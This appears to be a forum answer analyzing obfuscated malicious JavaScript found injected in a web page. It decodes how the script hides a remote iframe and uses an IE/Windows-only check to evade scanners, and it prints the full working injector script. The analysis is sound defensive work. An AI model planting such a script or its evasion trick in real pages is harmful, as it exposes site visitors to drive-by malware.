    <p>If you crawl through the code and methodically replace the junk identifier names, it makes a lot more sense. Most of the code and identifiers are just there to obscure, and a lot of the rest of it just looks like boilerplate code for browser-compatible ways to do things like attach events.</p> <p>It also makes a pretty big deal of checking that you're on Windows, for some reason, but that doesn't change the payload that's eventually delivered. The check only decides whether the payload is injected at all: <code>/*@cc_on true; @*/ false</code> is JScript conditional compilation, which evaluates to true only in Internet Explorer, and the second test looks for "Win" in <code>navigator.platform</code>. So a scan of the page from any other browser or platform will not show the iframe being added.</p> <p>The piece that deploys the payload to the page is here:</p> <pre><code> var newElement = window[_document][_createElement](_div); newElement[_innerHTML] = decodeString(key, payload); newElement[_style][_display] = _none; window[_document][_body][_appendChild](newElement); </code></pre> <p>The payload decrypts as:</p> <pre><code> &lt;iframe src='http://teenee.&amp;lt;OBFUSCATED&amp;gt;.com/speedo.msg?13' width='436' height='158' align="right"&gt;&lt;/iframe&gt; </code></pre> <p>Here's the full script as far as I decoded it. Two caveats on the renamed identifiers: the call is <code>decodeString(key, payload)</code>, so the array named <code>key</code> actually holds the encoded characters (each XORed with 58) and the array named <code>payload</code> is only the order in which to read them; and the <code>"key"</code> entry in the <code>_mousemove</code> array is a leftover of the renaming, where the original hex byte was presumably <code>"a"</code> (the other bytes decode to "mousemo?e").</p> <pre><code>&lt;script&gt; var payload = ["98", "73", "79", "45", "64", "92", "91", "66", "35", "70", "82", "4", "65", "80", "17", "76", "3", "74", "41", "69", "1", "40", "77", "52", "54", "42", "9", "22", "88", "0", "30", "59", "26", "94", "99", "85", "16", "86", "55", "34", "81", "67", "56", "97", "36", "78", "63", "72", "38", "43", "62", "7", "33", "96", "31", "25", "90", "19", "48", "6", "14", "87", "28", "13", "23", "24", "68", "39", "61", "49", "37", "71", "10", "12", "83", "44", "29", "32", "84", "50", "18", "100", "47", "15", "51", "20", "53", "11", "93", "58", "60", "2", "95", "8", "27", "75", "46", "21", "5", "89", "57"]; var key = ["83", "78", "4", "74", "7", "87", "29", "29", "21", "20", "29", "93", "11", "29", "14", "7", "87", "78", "83", "82", "72", "91", "78", "26", "82", "94", "83", "83", "12", "29", "94", "83", "26", "26", "74", "73", "20", "78", "5", "83", "95", "21", "95", "11", "2", "72", "72", "84", "7", "82", "86", "24", "84", "83", "95", "73", "94", "4", "78", "64", 
"24", "93", "9", "73", "91", "29", "26", "95", "95", "21", "72", "7", "93", "83", "0", "92", "78", "95", "87", "92", "82", "95", "89", "15", "91", "85", "21", "9", "91", "95", "78", "95", "87", "82", "20", "6", "77", "85", "6", "89", "93"]; function decodeString(msg, key) { var retval = ''; for (var i = 0; i &lt; msg.length; i++) retval += String.fromCharCode(parseInt(msg[key[i]]) ^ 58); return retval; } function decodeString2(msg, key) { var retval = ''; for (var i = 0; i &lt; msg.length; i++) retval += String.fromCharCode(parseInt(msg[i], 16) ^ key); return retval; } (function (_window) { var executePayload = function () { if (!_window.storedData) { _window.storedData = 133; var crypt1 = ["20", "2b", "27", "31", "29", "21", "2a", "30"]; var _document = decodeString2(crypt1, 68); var crypt2 = ["7f", "6e", "79", "7d", "68", "79", "59", "70", "79", "71", "79", "72", "68"]; var _createElement = decodeString2(crypt2, 28); var crypt3 = ["d3", "de", "c1"]; var _div = decodeString2(crypt3, 183); var crypt4 = ["90", "97", "97", "9c", "8b", "b1", "ad", "b4", "b5"]; var _innerHTML = decodeString2(crypt4, 249); var crypt5 = ["1f", "18", "15", "0", "9"]; var _style = decodeString2(crypt5, 108); var crypt6 = ["fd", "f0", "ea", "e9", "f5", "f8", "e0"]; var _display = decodeString2(crypt6, 153); var crypt7 = ["ed", "ec", "ed", "e6"]; var _none = decodeString2(crypt7, 131); var crypt9 = ["8e", "83", "88", "95"]; var _body = decodeString2(crypt9, 236); var crypt10 = ["7f", "6e", "6e", "7b", "70", "7a", "5d", "76", "77", "72", "7a"]; var _appendChild = decodeString2(crypt10, 30); if (function FRlTmsRJNFmnm() { var iBcOzbBLaJib = true; var yLjfQ = true; var Xbj = /*@cc_on true; @*/ false; if (Xbj) { iBcOzbBLaJib = true; } else { iBcOzbBLaJib = false; } var crypt1 = ["22", "1c", "1b"]; var _Win = decodeString2(crypt1, 117); var crypt2 = ["89", "a5", "a7"]; var _Mac = decodeString2(crypt2, 196); var crypt3 = ["2d", "8", "f", "14", "19"]; var _Linux = decodeString2(crypt3, 97); var 
crypt4 = ["af", "a0", "b7", "a8", "a6", "a0", "b5", "ae", "b3"]; var _navigator = decodeString2(crypt4, 193); var crypt5 = ["4d", "4a", "40", "41", "5c", "6b", "42"]; var _indexOf = decodeString2(crypt5, 36); var crypt6 = ["f5", "e9", "e4", "f1", "e3", "ea", "f7", "e8"]; var _platform = decodeString2(crypt6, 133); var browserSaysWindows = window[_navigator][_platform][_indexOf](_Win) &gt; -1; if (browserSaysWindows) { yLjfQ = true; } else { yLjfQ = false; } return (iBcOzbBLaJib &amp;&amp; yLjfQ); }()) { var newElement = window[_document][_createElement](_div); newElement[_innerHTML] = decodeString(key, payload); newElement[_style][_display] = _none; window[_document][_body][_appendChild](newElement); } } }; var crypt1 = ["b2", "b7", "b7", "96", "a5", "b6", "bd", "a7", "9f", "ba", "a0", "a7", "b6", "bd", "b6", "a1"]; var __addEventListener = decodeString2(crypt1, 211); var crypt2 = ["2f", "3a", "3a", "2f", "2d", "26", "b", "38", "2b", "20", "3a"]; var _attachEvent = decodeString2(crypt2, 78); var crypt3 = ["87", "86"]; var KdAtYlyqzy = decodeString2(crypt3, 232); var crypt4 = ["7a", "79", "77", "72"]; var _load = decodeString2(crypt4, 22); var crypt5 = ["76", "7f", "73", "65", "63"]; var focus = decodeString2(crypt5, 16); var crypt6 = ["67", "69", "70", "77"]; var _blur = decodeString2(crypt6, 5); var crypt7 = ["11", "13", "9", "f", "19", "11", "13", "key", "19"]; var _mousemove = decodeString2(crypt7, 124); var crypt8 = ["4b", "40", "42", "5d", "4a", "4e", "4b", "56"]; var _domready = decodeString2(crypt8, 47); var _addEventListener; if (_window[__addEventListener]) _addEventListener = __addEventListener; else _addEventListener = _attachEvent; var eventList = [_load, focus, _blur, _mousemove, _domready]; for (events in eventList) { _window[_addEventListener](eventList[events], executePayload, false); _window[_addEventListener]('on' + eventList[events], executePayload, false); } })(window) &lt;/script&gt; </code></pre> <p>Unfortunately, there's not much clue as to 
how it got here, just what it's doing: injecting an IFrame into your page, and you probably already knew that.</p> <p>Good luck!</p>